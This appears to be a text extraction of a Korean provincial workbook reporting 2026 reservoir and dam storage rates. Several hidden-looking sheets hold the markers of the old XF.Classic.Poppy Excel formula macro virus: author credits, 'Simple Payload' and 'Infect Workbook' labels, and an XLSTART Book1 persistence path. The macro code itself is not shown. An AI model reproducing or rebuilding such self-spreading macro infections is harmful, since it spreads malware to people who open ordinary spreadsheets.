Workbook
Name aa: [1]XL4Poppy!$C$31
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(10월1일-결재).xls"}
Name Document_array: {"Book1","경북저수율(9월17일-결재).xls","080917저수지저수상황.xls"}
Name Document_array: {"Book1"}

Sheet 000000

Sheet 100000

Sheet xxxxxxxx
A1: 경북저수율(9월17일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet1
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet2
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet Recovered_Sheet3
A1: 경북저수율(10월1일-결재).xls
A2: Book1
A3: C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: 3
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer
A11: (C) The Narkotic Network 1998
A14: **Simple Payload**
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
C26: **Infect Workbook**

Sheet 시군별
A1: 2026년 저수지 저수현황 보고
A3: □ 저수지 저수상황
A4: 구 분 | C4: 저수지수 | D4: 수혜면적 | E4: 유효저수량 | F4: 현저수량 | G4: 저수율 (%)
D5: (ha) | E5: (천㎥) | F5: (천㎥) | G5: 금주 | H5: 전주 | I5: 전년 | J5: 평년
A6: 경 | B6: 합 계 | C6: 4942 | D6: 60971.1 | E6: 506371 | F6: 420126.98 | G6: 83 | H6: 84.4 | I6: 76.5 | J6: 78.648281
B7: 시군관리 | C7: 4291 | D7: 21958 | E7: 80273 | F7: 61437.96 | G7: 76.5 | H7: 76.6 | I7: 77.6 | J7: 79.547619
A8: 북 | B8: 공사관리 | C8: 651 | D8: 39013.1 | E8: 426098 | F8: 358689.02 | G8: 84.2 | H8: 85.9 | I8: 76.3 | J8: 78.494239
A9: 포 | B9: 소 계 | C9: 275 | D9: 5860.4 | E9: 44117 | F9: 37669.966 | G9: 85.386508 | H9: 87.666603 | I9: 73.975176 | J9: 77.73653
A10: 항 | B10: 시 관 리 | C10: 218 | D10: 1963.7 | E10: 4133 | F10: 3269.203 | G10: 79.1 | H10: 79.7 | I10: 77.8 | J10: 75
A11: 시 | B11: 공사관리 | C11: 57 | D11: 3896.7 | E11: 39984 | F11: 34400.763 | G11: 86.036321 | H11: 88.490082 | I11: 73.590647 | J11: 80.47306
A12: 경 | B12: 소 계 | C12: 389 | D12: 9713.8 | E12: 74822 | F12: 60039.582 | G12: 80.24322 | H12: 81.885686 | I12: 76.902027 | J12: 79.118736
A13: 주 | B13: 시 관 리 | C13: 313 | D13: 3485.1 | E13: 5711 | F13: 4448.869 | G13: 77.9 | H13: 77.9 | I13: 82.9 | J13: 82.5
A14: 시 | B14: 공사관리 | C14: 76 | D14: 6228.7 | E14: 69111 | F14: 55590.713 | G14: 80.436852 | H14: 82.215044 | I14: 76.407854 | J14: 75.737473
A15: 김 | B15: 소 계 | C15: 241 | D15: 2334.5 | E15: 9656 | F15: 8819.7146 | G15: 91.339215 | H15: 91.705785 | I15: 76.085563 | J15: 84.621203
A16: 천 | B16: 시 관 리 | C16: 233 | D16: 1663.1 | E16: 2948 | F16: 2599.2516 | G16: 88.17 | H16: 88.17 | I16: 87.3 | J16: 84
A17: 시 | B17: 공사관리 | C17: 8 | D17: 671.4 | E17: 6708 | F17: 6220.463 | G17: 92.732007 | H17: 93.259675 | I17: 70.994931 | J17: 85.242407
A18: 안 | B18: 소 계 | C18: 181 | D18: 2530.1 | E18: 14300 | F18: 11147.494 | G18: 77.954506 | H18: 78.721118 | I18: 71.828478 | J18: 77.500484
A19: 동 | B19: 시 관 리 | C19: 162 | D19: 1559.6 | E19: 5121 | F19: 4224.825 | G19: 82.5 | H19: 82.5 | I19: 84.3 | J19: 82.8
... A71: 군 | B71: 공사관리 | C71: 7 | D71: 566.9 | E71: 6600 | F71: 6205.385 | G71: 94.020985 | H71: 94.328162 | I71: 80.503659 | J71: 76.760926

Sheet 총괄
A2: 저 수 지 저 수 상 황
A3: =[2]결재!A3:J3 -> 46139
A5: □ 저수지수 : | B5: =B6+F6 -> 4942 | C5: (유효저수량 | E5: =[2]시군별!E6 -> 506371 | G5: 수혜면적 | I5: =[2]시군별!D6 -> 60971.1
A6: ㅇ 시 · 군 : | B6: 4291 | C6: 한국농어촌공사 : | F6: 651
A9: □ 저 수 율 : | B9: =[2]시군별!G6 -> 83 | C9: % | D9: =[2]결재!D9 -> (2025년동기 : | F9: =[2]시군별!I6 -> 76.5 | G9: %, | H9: 평년 : | I9: =[2]시군별!J6 -> 78.648281 | J9: %)
A11: ㅇ 시 · 군 : | B11: =[2]시군별!G7 -> 76.5 | C11: % | D11: ( 〃 : | F11: =[2]시군별!I7 -> 77.6 | G11: %, | H11: 〃 : | I11: =[2]시군별!J7 -> 79.547619 | J11: %)
A13: ㅇ 한 농 공 : | B13: =[2]시군별!G8 -> 84.2 | C13: % | D13: ( 〃 : | F13: =[2]시군별!I8 -> 76.3 | G13: %, | H13: 〃 : | I13: =[2]시군별!J8 -> 78.494239 | J13: %)
A15: □ 주요댐 저수율
A17: ㅇ 안 동 댐 : | B17: =[2]결재!B17 -> 45.3 | C17: % | D17: =[2]결재!D17 -> (2025년동기 : | F17: =[2]결재!F17 -> 0.548 | G17: , | H17: 평년 : | I17: =[2]결재!I17 -> 0.437 | J17: )
F18: .
A19: ㅇ 임 하 댐 : | B19: =[2]결재!B19 -> 46.9 | C19: % | D19: ( 〃 : | F19: =[2]결재!F19 -> 0.362 | G19: , | H19: 〃 : | I19: =[2]결재!I19 -> 0.389 | J19: )
A21: ㅇ 영 주 댐 : | B21: =[2]결재!B21 -> 19.8 | C21: % | D21: ( 〃 : | F21: =[2]결재!F21 -> 0.302 | G21: , | H21: 〃 : | I21: =[2]결재!I21 -> 0.385 | J21: )
A23: ㅇ 영 천 댐 : | B23: =[2]결재!B23 -> 46.7 | C23: % | D23: ( 〃 : | F23: =[2]결재!F23 -> 0.339 | G23: , | H23: 〃 : | I23: =[2]결재!I23 -> 0.393 | J23: )
A25: ㅇ 운 문 댐 : | B25: =[2]결재!B25 -> 39.3 | C25: % | D25: ( 〃 : | F25: =[2]결재!F25 -> 0.431 | G25: , | H25: 〃 : | I25: =[2]결재!I25 -> 0.439 | J25: )
A27: ㅇ 군 위 댐 : | B27: =[2]결재!B27 -> 36.6 | C27: % | D27: ( 〃 : | F27: =[2]결재!F27 -> 0.378 | G27: , | H27: 〃 : | I27: =[2]결재!I27 -> 0.414 | J27: )
A29: ㅇ 부 항 댐 : | B29: =[2]결재!B29 -> 28.2 | C29: % | D29: ( 〃 : | F29: =[2]결재!F29 -> 0.444 | G29: , | H29: 〃 : | I29: =[2]결재!I29 -> 0.481 | J29: )
A31: ㅇ 경 천 댐 : | B31: =[2]결재!B31 -> 98.4 | C31: % | D31: ( 〃 : | F31: =[2]결재!F31 -> 0.951 | G31: , | H31: 〃 : | I31: =[2]결재!I31 -> 0.678 | J31: )
A33: ㅇ 성 주 댐 : | B33: =[2]결재!B33 -> 85 | C33: % | D33: ( 〃 : | F33: =[2]결재!F33 -> 0.82 | G33: , | H33: 〃 : | I33: =[2]결재!I33 -> 0.917 | J33: )
A35: ◆ 강 우 량
A36: =[2]결재!A37 -> ㅇ2026.01.01~ | B36: =[2]결재!B37 -> 46139 | C36: =[2]결재!C37:D37 -> 145.6 | E36: =[2]결재!E37 -> (전년 113.5 평년 180)
